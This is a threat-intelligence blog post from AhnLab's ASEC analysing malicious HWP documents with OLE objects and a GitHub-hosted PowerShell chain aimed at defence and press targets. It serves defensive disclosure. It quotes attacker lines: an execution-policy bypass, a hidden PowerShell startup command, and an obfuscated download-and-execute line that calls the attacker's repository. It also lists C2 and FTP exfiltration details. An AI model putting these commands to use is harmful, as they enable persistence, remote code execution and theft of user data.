Warning Against HWP Documents Embedded with Malicious OLE Objects – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas.

The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] has a similar operation method to the malware covered in a previous post [1] and also uses the same FTP server password. Such similarities allow us to believe that they were made by the same person.

The figure below shows a brief flow of operations of each type.

Figure 1. Operation process

<Type 1>

This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.

Date File name
May 25, 2023 Unification** cue sheet May 29 Mon.hwp
May 25, 2023 20230508_ProfessorMeetingMaterial_NewTemplate.hwp
May 25, 2023 (***)2023-05-30 Material for Professor Meeting.hwp
May 30, 2023 Payment Receipt (Chief ***).hwp
May 30, 2023 (Template)Payment Receipt_Congratulatory and Condolence Money.hwp
June 22, 2023 20230512_MyungbakScenario_Details.hwp
June 22, 2023 1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp
June 22, 2023 Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp
June 23, 2023 [Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp
June 29, 2023 National Defense and Protection Sacrificed to Political Disputes.hwp
July 11, 2023 ** Unification April 30 2023 (Sun).hwp
July 17, 2023 Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp
July 20, 2023 42- Wagner’s Lesson (Aug 2023).hwp
July 24, 2023 [Template1] Business Budget Issue Request.hwp
Aug 14, 2023 Dissertation Evaluation (** Kwon).hwp
Sep 01, 2023 Evidentiary Documents of Incentive Payment.hwp
Sep 04, 2023 ** Unification Sep 06 Final Wednesday.hwp
Sep 06, 2023 ** Kim_Statement of Honorarium Payment.hwp
Sep 19, 2023 [Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp
Table 1. Identified HWP document file names

The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.

Figure 2. Document content

In the documents, the threat actor embedded an OLE object the size of which exceeds the page boundaries (see Figure 3), so that the OLE object runs no matter where the user clicks.

Figure 3. OLE object embedded in the document

The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.

Figure 4. OLE object embedded in HWP files
Figure 5. Message box displayed when the OLE object is clicked

At the time of analysis, the URL was not available and anomalous behaviors could not be observed. The malicious URLs identified so far are as follows. It seems that these documents are being distributed to specific individuals due to the fact that each document uses a different parameter value.

  • hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
  • hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]

<Type 2>

This type has a malicious script file embedded in HWP documents, and ultimately, it executes an additional script code uploaded to GitHub. Below are the file names of HWP documents presumed to be this type.

Date File name
July 31, 2023 test.hwp
July 27, 2023 Honorarium Information_aa.hwp
Aug 31, 2023 Consultation Request.hwp
Sep 01, 2023 Honorarium Template.hwp
Sep 14, 2023 main.hwp
Oct 04, 2023 test1.hwp
2023.10.04 cna[q].hwp
Table 2. Identified HWP document file names

The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).

Figure 6. test1.hwp document content

When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.

zz.bat contains PowerShell commands that download and execute additional data by connecting to a GitHub address inside oz.txt.

Figure 7. zz.bat file content
Figure 8. oz.txt file content

Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.

Figure 9. Code in hxxps://raw.githubusercontent.com/babaramam/repo/main/pq.txt
Figure 10. Script codes uploaded on GitHub

down.txt, info.txt, and upload.txt seen in Figure 10 all have obfuscated pieces of data uploaded. Upon connecting to the corresponding URLs, these pieces of data are deobfuscated with a certain key value then executed.

The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.

Function Name Feature
mainFunc Changes PowerShell policy
Functions executed in the following order: getinfo – uploadResult – downCommand
getinfo Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt
Collects user PC information such as network configuration information
uploadResult Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt
Uploads the collected information to the threat actor’s FTP server
downCommand Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt
Creates additional malicious files
Table 3. Features of each function

The function mainFunc which is executed first changes the current user’s PowerShell policy with the following command and enables the execution of the PowerShell script that is downloaded later on.

  • Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force
Figure 11. mainFunc code

The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%AhnlabAhnlab.hwp.

Figure 12. getinfo code

The table below shows the collected pieces of information.

Command Collected Information
Get-ChildItem ([Environment]::GetFolderPath(“Recent”)) List of recently used files
ipconfig /all List of network configurations
Get-process List of processes
Table 4. Collected information
Figure 13. The created Ahnlab.hwp file

The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%AhnlabAhnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.

Figure 14. Deobfuscated code of upload.txt
  • Address: plm.myartsonline[.]com
  • User name: 4154836

The function downCommand which is continuously executed afterward executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file for the malware to maintain persistence. To enable the malicious script to be executed continuously, the threat actor creates an LNK file in the Startup folder.

Figure 15. The created LNK file

The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command which executes the script uploaded to  hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run.

  • LNK file command
    C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:Users[user]AppDataRoamingMicrosoftWindowsthumbs.log‘);invoke-expression $x}
  • thumbs.log data
    [string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c

While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.

With the malware from the post in June [2] also being distributed through HWP documents, there are multiple malicious HWP documents in distribution nowadays. When opening an HWP document, users must pay attention to its author and the sender.

[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)

[IOC]
<hwp>
2f0a67b719d8303c0ec7cc9057ed8411
af5bbab33f934dc016fc1aa0d910820e
7f3a30525b9324a2aeb32a9018df944f
361237b6b385874f02f3724ae50d1522
a242741873637fdac8f69f2ffdba47bc
<script>
7284a6376aa79a2384f797769b7ce086
2ef182bced72da507d2e403ab9db3c9f
f416b44332b4fb394b4735634cb07ff2
c16796909d5feea709d99e306f7e9975
0217e70fd7bc3a65ee0f2dd60ff85fbf
d5d395d90ccf9a7309f2f64169a2c019
8cafe74f03605a9bfaea5081b3ed0fc2
4934226f319d82ae092ada2525a7feb5
1061425d7e3d054a79f9294a2118b5da
2773acee87413790e9ace99c536c78ad
77edb140b86596eabe3602bb7febb997
<C2>
hxxp://host.sharingdocument.one/dashboard/explore/starred?hwpview=
hxxp://mail.smartprivacyc.com/get/account/view?myact=

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/58335/